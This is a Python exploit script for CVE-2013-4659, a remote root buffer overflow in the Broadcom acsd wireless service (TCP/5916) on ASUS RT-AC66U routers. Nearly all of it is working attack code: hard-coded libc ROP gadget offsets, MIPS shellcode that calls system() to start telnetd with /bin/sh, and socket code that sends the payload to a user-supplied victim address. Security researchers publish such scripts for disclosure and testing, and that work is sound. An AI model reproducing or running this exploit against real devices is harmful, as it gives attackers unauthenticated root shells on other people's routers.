ASUS RT-AC66U ACSD Remote Root Buffer Overflow

`#!/usr/bin/env python  
  
import signal, struct  
from time import sleep  
from socket import *  
from sys import exit, exc_info  
  
#  
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command  
# Discovered and Reported*June 2013   
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson  
# *Security Analsyts @ Independent Security Evaluators  
# Software Vendor*********http://asus.com  
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/  
# Software****************acsd wireless service (Listens on TCP/5916)  
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)   
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659  
#  
# Overview:  
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple   
# Buffer Overflow attacks.  
#  
# Multiple overflows exist in the following software:  
#  
# - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)  
#   
  
  
def sigHandle(signum, frm): # Signal handler  
  
print "\n[!!!] Cleaning up the exploit... [!!!]\n"  
sleep(1)  
exit(0)  
  
  
def targServer():  
  
while True:   
try:  
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))  
server = inet_ntoa(server)  
break  
except:  
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"  
sleep(1)  
continue  
  
return server   
  
  
def main():  
  
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command  
[*] Discovered and Reported: June 2013  
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE  
[*] Software Vendor: http://asus.com  
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/  
[*] Software: acsd wireless service (Listens on TCP/5916)  
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)  
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")  
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c  
victim = targServer()  
port = int(5916)  
acsdCmd = "autochannel&param=" #Vulnerable command - JH  
  
# base address of .text section of libc.so.0 in acsd's address space  
libc_base = 0x2ab25000  
  
# ROP gadget #1  
# lui s0,0x2  
# li a0,1  
# move t9,s1  
# jalr t9  
# ori a1,s0,0x2  
ra1 = struct.pack("<L", libc_base + 0x2d39c)  
  
# ROP gadget #2  
# move t9,s3  
# lw ra,44(sp)  
# lw s4,40(sp)  
# lw s3,36(sp)  
# lw s2,32(sp)  
# lw s1,28(sp)  
# lw s0,24(sp)  
# jr t9  
s1 = struct.pack("<L", libc_base + 0x34358)  
  
# sleep() - used to force program context switch (cache flush)  
s3 = struct.pack("<L", libc_base + 0x2cb90)  
  
# ROP gadget #3  
# addiu a1,sp,24  
# lw gp,16(sp)  
# lw ra,32(sp)  
# jr ra  
# addiu sp,sp,40  
ra2 = struct.pack("<L", libc_base + 0xa1b0)  
  
# ROP gadget #4  
# move t9,a1  
# addiu a0,a0,56  
# jr t9  
# move a1,a2  
ra3 = struct.pack("<L", libc_base + 0x3167c)  
  
# jalr sp  
jalr_sp = "\x09\xf8\xa0\x03"  
  
JuNk = "\x42" * 510  
safeNop = "2Aa3"  
  
#80 Bytes system() Shellcode by Jacob Holcomb of ISE  
#Calling system() and executing telnetd -l /bin/sh  
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"  
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"  
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"  
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"  
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"  
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"  
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"  
shellcode += "\x41\x61\x33"  
  
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]  
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]  
sploit += safeNop + shellcode  
  
try:  
print "\n [*] Creating network socket."  
net_sock = socket(AF_INET, SOCK_STREAM)  
except:  
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()   
sleep(1)  
exit(0)   
  
try:  
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)  
net_sock.connect((victim, port))  
except:  
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())  
sleep(1)  
exit(0)  
  
try:  
print """ [*] Attempting to exploit the acsd param command.  
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.  
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))  
net_sock.send(sploit)  
sleep(1)  
except:  
print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())  
sleep(1)  
exit(0)  
  
try:  
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!  
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""  
net_sock.close()  
except:  
print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()  
sleep(1)  
exit(0)  
  
  
if __name__ == "__main__":  
main()  
`